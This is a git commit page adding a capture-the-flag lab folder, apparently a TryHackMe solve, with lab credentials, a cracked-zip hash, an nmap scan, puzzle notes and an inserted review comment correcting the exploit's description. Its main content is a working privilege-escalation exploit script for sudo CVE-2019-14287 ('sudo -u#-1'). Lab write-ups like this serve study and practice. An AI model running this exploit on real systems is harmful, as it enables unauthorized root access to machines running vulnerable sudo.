author | Raghuram Subramani <raghus2247@gmail.com> | 2022-09-17 21:21:29 -0400 |
---|---|---|
committer | Raghuram Subramani <raghus2247@gmail.com> | 2022-09-17 21:21:29 -0400 |
commit | 8e07e852ee302516e02e8d2773ca45538c28910e (patch) | |
tree | cd44dea18d253069cb5f83b6f022e30a20a5c858 | |
parent | a28bbfd309eba3222d9938d9b3ce185fd1e8241e (diff) |
add agent_sudo
-rw-r--r-- | agent_sudo/47502.py | 80 | ||||
-rw-r--r-- | agent_sudo/Alien_autospy.jpg | bin | 0 -> 42189 bytes | |||
-rw-r--r-- | agent_sudo/README.md | 6 | ||||
-rw-r--r-- | agent_sudo/To_agentJ.txt | 6 | ||||
-rw-r--r-- | agent_sudo/_cutie.png.extracted/365 | bin | 0 -> 279312 bytes | |||
-rw-r--r-- | agent_sudo/_cutie.png.extracted/365.zlib | bin | 0 -> 33973 bytes | |||
-rw-r--r-- | agent_sudo/_cutie.png.extracted/8702.zip | bin | 0 -> 280 bytes | |||
-rw-r--r-- | agent_sudo/_cutie.png.extracted/To_agentR.txt | 6 | ||||
-rw-r--r-- | agent_sudo/cute-alien.jpg | bin | 0 -> 33143 bytes | |||
-rw-r--r-- | agent_sudo/cutie.png | bin | 0 -> 34842 bytes | |||
-rw-r--r-- | agent_sudo/forjohn_zip | 1 | ||||
-rw-r--r-- | agent_sudo/message.txt | 8 | ||||
-rw-r--r-- | agent_sudo/nmap | 25 |
13 files changed, 132 insertions, 0 deletions
diff --git a/agent_sudo/47502.py b/agent_sudo/47502.py
new file mode 100644
index 0000000..907d29a
--- /dev/null
+++ b/agent_sudo/47502.py
@@ -0,0 +1,80 @@
+# Exploit Title : sudo 1.8.27 - Security Bypass
+# Date : 2019-10-15
+# Original Author: Joe Vennix
+# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
+# Version : Sudo <1.8.28
+# Tested on Linux
+# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
+# Fix : The bug is fixed in sudo 1.8.28
+# CVE : 2019-14287
+
+'''Check for the user sudo permissions
+
+sudo -l
+
+User hacker may run the following commands on kali:
+ (ALL, !root) /bin/bash
+
+
+So user hacker can't run /bin/bash as root (!root)
+
+
+User hacker sudo privilege in /etc/sudoers
+
+# User privilege specification
+root ALL=(ALL:ALL) ALL
+
+hacker ALL=(ALL,!root) /bin/bash
+
+
+With ALL specified, user hacker can run the binary /bin/bash as any user
+
+EXPLOIT:
+
+sudo -u#-1 /bin/bash
+
+Example :
+
+hacker@kali:~$ sudo -u#-1 /bin/bash
+root@kali:/home/hacker# id
+uid=0(root) gid=1000(hacker) groups=1000(hacker)
+root@kali:/home/hacker#
+
+Description :
+Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
+-u#-1 returns as 0 which is root's id
+
+and /bin/bash is executed with root permission
+Proof of Concept Code :
+
+How to use :
+python3 sudo_exploit.py
+
+'''
+
+
+#!/usr/bin/python3
+
+import os
+
+#Get current username
+
+username = input("Enter current username :")
+
+
+#check which binary the user can run with sudo
+
+os.system("sudo -l > priv")
+
+
+os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")
+
+binary_file = open("binary")
+
+binary= binary_file.read()
+
+#execute sudo exploit
+
+print("Lets hope it works")
+
+os.system("sudo -u#-1 "+ binary)
\ No newline at end of file
diff --git a/agent_sudo/Alien_autospy.jpg b/agent_sudo/Alien_autospy.jpg
Binary files differ
new file mode 100644
index 0000000..b82c847
--- /dev/null
+++ b/agent_sudo/Alien_autospy.jpg
diff --git a/agent_sudo/README.md b/agent_sudo/README.md
new file mode 100644
index 0000000..e20e876
--- /dev/null
+++ b/agent_sudo/README.md
@@ -0,0 +1,6 @@
+> creds
+```
+ftp: chris:crystal
+zip: alien
+james:hackerrules!
+```
diff --git a/agent_sudo/To_agentJ.txt b/agent_sudo/To_agentJ.txt
new file mode 100644
index 0000000..8cd771b
--- /dev/null
+++ b/agent_sudo/To_agentJ.txt
@@ -0,0 +1,6 @@
+Dear agent J,
+
+All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
+
+From,
+Agent C
diff --git a/agent_sudo/_cutie.png.extracted/365 b/agent_sudo/_cutie.png.extracted/365
Binary files differ
new file mode 100644
index 0000000..0a09622
--- /dev/null
+++ b/agent_sudo/_cutie.png.extracted/365
diff --git a/agent_sudo/_cutie.png.extracted/365.zlib b/agent_sudo/_cutie.png.extracted/365.zlib
Binary files differ
new file mode 100644
index 0000000..be7e8d6
--- /dev/null
+++ b/agent_sudo/_cutie.png.extracted/365.zlib
diff --git a/agent_sudo/_cutie.png.extracted/8702.zip b/agent_sudo/_cutie.png.extracted/8702.zip
Binary files differ
new file mode 100644
index 0000000..ead18d3
--- /dev/null
+++ b/agent_sudo/_cutie.png.extracted/8702.zip
diff --git a/agent_sudo/_cutie.png.extracted/To_agentR.txt b/agent_sudo/_cutie.png.extracted/To_agentR.txt
new file mode 100644
index 0000000..732bb92
--- /dev/null
+++ b/agent_sudo/_cutie.png.extracted/To_agentR.txt
@@ -0,0 +1,6 @@
+Agent C,
+
+We need to send the picture to 'QXJlYTUx' as soon as possible!
+
+By,
+Agent R
diff --git a/agent_sudo/cute-alien.jpg b/agent_sudo/cute-alien.jpg
Binary files differ
new file mode 100644
index 0000000..1780a48
--- /dev/null
+++ b/agent_sudo/cute-alien.jpg
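Review bot: The `Description :` paragraph in the docstring of agent_sudo/47502.py misstates why CVE-2019-14287 works, which matters to anyone using this file to judge exposure. As described in the sudo advisory, the id -1 (or 4294967295) is not "returned as 0"; it is handed to setresuid()/setreuid(), which treat -1 as "leave unchanged", so the command keeps the uid 0 that sudo is already running with, and only sudoers entries whose Runas list contains `ALL` are affected. I would replace the two description lines with `-1 is passed through to setresuid(), which treats it as "no change"; sudo is already uid 0, so the command runs as root. Only Runas specs containing ALL are affected; fixed in 1.8.28.` For triage, the advisory notes that sudo logs such a run with the numeric target id rather than root, so that value in sudo log entries is worth alerting on. Separately, `username` is read but never used, and the `#!/usr/bin/python3` line sits after the docstring where it has no effect.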
diff --git a/agent_sudo/cutie.png b/agent_sudo/cutie.png
Binary files differ
new file mode 100644
index 0000000..6e51f7c
--- /dev/null
+++ b/agent_sudo/cutie.png
diff --git a/agent_sudo/forjohn_zip b/agent_sudo/forjohn_zip
new file mode 100644
index 0000000..bac0057
--- /dev/null
+++ b/agent_sudo/forjohn_zip
@@ -0,0 +1 @@
+8702.zip/To_agentR.txt:$zip2$*0*1*0*4673cae714579045*67aa*4e*61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d03755e0ca861a5a3dcbabfa618784b85075f0ef476c6da8261805bd0a4309db38835ad32613e3dc5d7e87c0f91c0b5e64e*4969f382486cb6767ae6*$/zip2$:To_agentR.txt:8702.zip:8702.zip
diff --git a/agent_sudo/message.txt b/agent_sudo/message.txt
new file mode 100644
index 0000000..090aa63
--- /dev/null
+++ b/agent_sudo/message.txt
@@ -0,0 +1,8 @@
+Hi james,
+
+Glad you find this message. Your login password is hackerrules!
+
+Don't ask me why the password look cheesy, ask agent R who set this password for you.
+
+Your buddy,
+chris
diff --git a/agent_sudo/nmap b/agent_sudo/nmap
new file mode 100644
index 0000000..7a021cd
--- /dev/null
+++ b/agent_sudo/nmap
@@ -0,0 +1,25 @@
+# Nmap 7.92 scan initiated Sat Sep 17 05:55:05 2022 as: nmap -vvv -p 21,22,80 -sC -sV -oN nmap 10.10.14.85
+Nmap scan report for 10.10.14.85
+Host is up, received conn-refused (0.14s latency).
+Scanned at 2022-09-17 05:55:05 EDT for 15s
+
+PORT STATE SERVICE REASON VERSION
+21/tcp open ftp syn-ack vsftpd 3.0.3
+22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5hdrxDB30IcSGobuBxhwKJ8g+DJcUO5xzoaZP/vJBtWoSf4nWDqaqlJdEF0Vu7Sw7i0R3aHRKGc5mKmjRuhSEtuKKjKdZqzL3xNTI2cItmyKsMgZz+lbMnc3DouIHqlh748nQknD/28+RXREsNtQZtd0VmBZcY1TD0U4XJXPiwleilnsbwWA7pg26cAv9B7CcaqvMgldjSTdkT1QNgrx51g4IFxtMIFGeJDh2oJkfPcX6KDcYo6c9W1l+SCSivAQsJ1dXgA2bLFkG/wPaJaBgCzb8IOZOfxQjnIqBdUNFQPlwshX/nq26BMhNGKMENXJUpvUTshoJ/rFGgZ9Nj31r
+| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHdSVnnzMMv6VBLmga/Wpb94C9M2nOXyu36FCwzHtLB4S4lGXa2LzB5jqnAQa0ihI6IDtQUimgvooZCLNl6ob68=
+| 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOL3wRjJ5kmGs/hI4aXEwEndh81Pm/fvo8EvcpDHR5nt
+80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
+|_http-title: Annoucement
+| http-methods:
+|_ Supported Methods: GET HEAD POST OPTIONS
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Sep 17 05:55:20 2022 -- 1 IP address (1 host up) scanned in 15.26 seconds |